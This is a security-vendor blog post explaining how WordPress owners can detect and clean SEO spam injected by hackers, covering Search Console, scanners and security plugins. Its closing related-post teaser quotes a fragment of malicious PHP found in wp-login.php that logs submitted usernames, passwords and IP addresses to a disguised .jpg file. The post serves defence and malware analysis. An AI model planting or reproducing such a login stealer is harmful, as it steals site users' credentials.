How to Find & Remove SEO Spam on WordPress

How to Find & Remove SEO Spam on WordPress

Perhaps the best way to dive into the subject of finding and removing SEO spam on WordPress is with a quick experiment — probably one you’ll want to conduct at a private location. Run a Google search with the terms buy viagra cialis.

Without clicking anything (seriously, don’t), take a close look at the results. You’ll likely see one or more seemingly innocent, non-pharmaceutical websites advertising these medications.

The URLs look like a writing website, but those page titles sure don’t!
The URLs look like a writing website, but those page titles sure don’t!

What is SEO spam on WordPress?

You’re looking at an example of a website that’s likely infected with SEO spam. And because WordPress websites are so common — along with their vulnerabilities — they’re frequently a target for bad actors and their scams. When a WordPress site gets hacked, the hacker has free reign to use it to further any number of sinister goals.

In the example we just saw, an ordinary web address seems to be driving traffic somewhere where they expect to buy medication, but will probably get ripped off.

The unique spelling of the medications we searched make them prime keywords for hackers to inject into a website in order to attract their actual targets. SEO spam can use all kinds of keywords — such as those for athletic shoes or adult content — to attract unwitting traffic. In fact, some reports indicate that more than half of all website hacks involve SEO spam.

How to Find SEO Spam on WordPress

Imagine you were the website owner in the experiment we just conducted. If your site showed up like that, wouldn’t you want to remove the SEO spam from WordPress right away? Unfortunately, SEO spam on WordPress isn’t always that obvious, as it can live not only on public-facing pages, but also in your site’s core files. Here are a few tools that can help you find SEO spam on a WordPress website.

Google Search Console

If you haven’t set up your website on Google Search Console, do it as soon as you can. It’s an invaluable tool that not only helps you find SEO spam on WordPress, but also maintain the overall health of your site. If you need to remove blackhat SEO spam from your WordPress site, Google Search Console will show you where in the directory to find it.

Google Transparency Report

In a previous post, we talked about website malware scanners you should check out, and Google Transparency Report was one of them. Enter the web address of your site or the URL of a specific page, and you’ll see whether or not Google deems it safe to visit. Even if you don’t suspect your site is infected, it’s still a good idea to check you standing with Google.

Google Yourself

Open an incognito tab in Chrome, and then search the URL of your website so its pages appear in the results. Check to see if any appear spammy. This certainly isn’t the most comprehensive method, but if you’re a website owner who admittedly isn’t “techy,” it should help you get started looking.

Website Scanners

While Google Transparency Report is intended for website visitors, there are many online scanners designed to help owners. For example, Sucuri SiteCheck and UnmaskParasites include functions such as scanning for malware like SEO spam on WordPress, checking your blacklist status, and finding vulnerabilities like out-of-date plugins and other security issues

Security Plugins

If you want to be proactive about avoiding SEO spam on WordPress, a security plugin is the way to go. One of the best, the Sucuri WordPress Plugin, hardens your website security to reduce the likelihood of an SEO spam infection. It also runs automatic scans for malware and includes several other features to lock down your WordPress site.

Types of SEO Spam on WordPress

Our own experience has revealed that SEO spam on WordPress can get fairly tricky and difficult to remove. You might not even notice an SEO spam infection if you don’t know what to look for. To make sure you understand what the bad guys are doing, let’s take a look at some of the most common types of SEO spam on WordPress.

Spammy Links

Hackers love a healthy website that ranks in search results because they can use it to attract victims. They’ll add links to your ordinary page content that will take visitors to another online property where they’ll likely get scammed.

Spammy Keywords

Even if they aren’t visible on public pages, spammy keywords can help hackers get your site to rank for the search terms they’re using in a scam. You might find them in less-than-obvious places, such as a page’s meta data.

Spammy Ads

A bad infection of SEO spam on WordPress might include banner ads or popups directing visitors to another site where bad actors are running a scam. Obviously, this creates a poor user experience and will erode trust visitors have in you.

Spammy Posts & Pages

Once hackers have access to your site, they can create entire blog posts or web pages optimized to rank for terms they’re using in a scam. These probably won’t appear in your navigation, but you can find them in your page list.

How to Remove SEO Spam on WordPress

For most site owners, removing SEO spam on WordPress is a huge chore. As we’ve discussed, SEO spam can take on many forms and appear on your site where you’d least expect it.

Meanwhile, your brand is being devalued, visitors are losing trust, and eventually you might even face suspension by your host and blacklisting by search engines.

If you have SEO spam on your WordPress site, the safest and smartest move is getting professional SEO spam removal services — right away. Sucuri is a particularly wise choice is this regard because of fast turnaround times, unlimited cleanups in the event of reinfection, and 24/7/365 support from a team of website security experts.

Conclusion

You simply can’t say enough about the positive impact that WordPress has on the online community. However, with it’s great popularity comes a greater chance of being targeted by bad actors.

The best way to enjoy a WordPress website is making sure it’s protected by a robust security solution, so you don’t have to live in fear of SEO spam on WordPress. And if you’re in the business of building websites for clients, ensuring their security is arguably the most ethical way to handle web development.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post